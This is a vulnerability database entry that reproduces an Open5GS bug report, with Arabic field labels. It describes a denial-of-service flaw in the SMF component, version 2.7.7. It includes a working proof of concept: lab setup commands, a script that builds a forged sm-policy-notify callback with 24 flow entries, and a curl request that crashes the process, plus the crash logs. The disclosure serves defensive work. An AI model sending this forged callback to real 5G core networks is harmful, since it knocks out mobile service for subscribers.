| عنوان | Open5gs SMF v2.7.7 Denial of Service |
|---|
| الوصف | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose `pccRules[*].flowInfos` list exceeds the internal PCC-rule flow array.
`update_authorized_pcc_rule_and_qos()` appends every `flowInfos` element into
`pcc_rule->flow[pcc_rule->num_of_flow]` without any upper-bound check:
```c
ogs_flow_t *flow = &pcc_rule->flow[pcc_rule->num_of_flow];
...
pcc_rule->num_of_flow++;
```
But `ogs_pcc_rule_t` only allocates `flow[OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE]`,
and that limit is `15`.
In live Docker, a callback with `24` valid `flowInfos` for an existing SMF
session corrupted the downstream QoS/PFCP build path and aborted the process.
This path requires an existing SMF session, so the reproduction below first
established a real UE PDU session using UERANSIM.
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
--network open5gs --network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
--network open5gs --network-alias ue.ueransim.org \
--cap-add NET_ADMIN --privileged \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this live run):
```bash
payload=$(python3 - <<'PY'
import json
body = {
"smPolicyDecision": {
"pccRules": {
"r1": {
"pccRuleId": "r1",
"precedence": 1,
"refQosData": ["q1"],
"flowInfos": [
{
"flowDirection": "UPLINK",
"flowDescription": f"permit out ip from 10.0.0.{i+1} 1000 to any"
}
for i in range(24)
]
}
},
"qosDecs": {
"q1": {"qosId": "q1", "5qi": 1, "priorityLevel": 1}
}
}
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -v \
-X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \
-H 'content-type: application/json' \
--data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T19:16:50Z smf
```
### Logs
```shell
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T19:16:55.932836745Z
04/10 19:16:55.835: [core] ERROR: No TLV length - [Ethernet Filter ID] T:138 I:0 (vsz=24)
04/10 19:16:55.835: [smf] ERROR: smf_n4_build_qos_flow_to_modify_list: Expectation `pkbuf' failed. (../src/smf/n4-build.c:641)
04/10 19:16:55.836: [smf] ERROR: smf_5gc_pfcp_send_qos_flow_list_modification_request: Expectation `rv == OGS_OK' failed. (../src/smf/pfcp-path.c:679)
04/10 19:16:55.836: [smf] FATAL: smf_qos_flow_binding: Assertion `OGS_OK == smf_5gc_pfcp_send_qos_flow_list_modification_request(...)' failed. (../src/smf/binding.c:781)
```
### Expected behaviour
SMF should reject oversized `flowInfos` input with a normal HTTP error response.
### Observed Behaviour
The callback tears down the HTTP/2 stream and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7 |
|---|
| المصدر | ⚠️ https://github.com/open5gs/open5gs/issues/4444 |
|---|
| المستخدم | FrankLin (UID 97501) |
|---|
| ارسال | 20/04/2026 09:05 PM (1 شهر منذ) |
|---|
| الاعتدال | 10/05/2026 04:40 PM (20 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 362547 [Open5GS حتى 2.7.7 SMF /src/smf/n4-build.c smf_n4_build_qos_flow_to_modify_list الحرمان من الخدمة] |
|---|
| النقاط | 20 |
|---|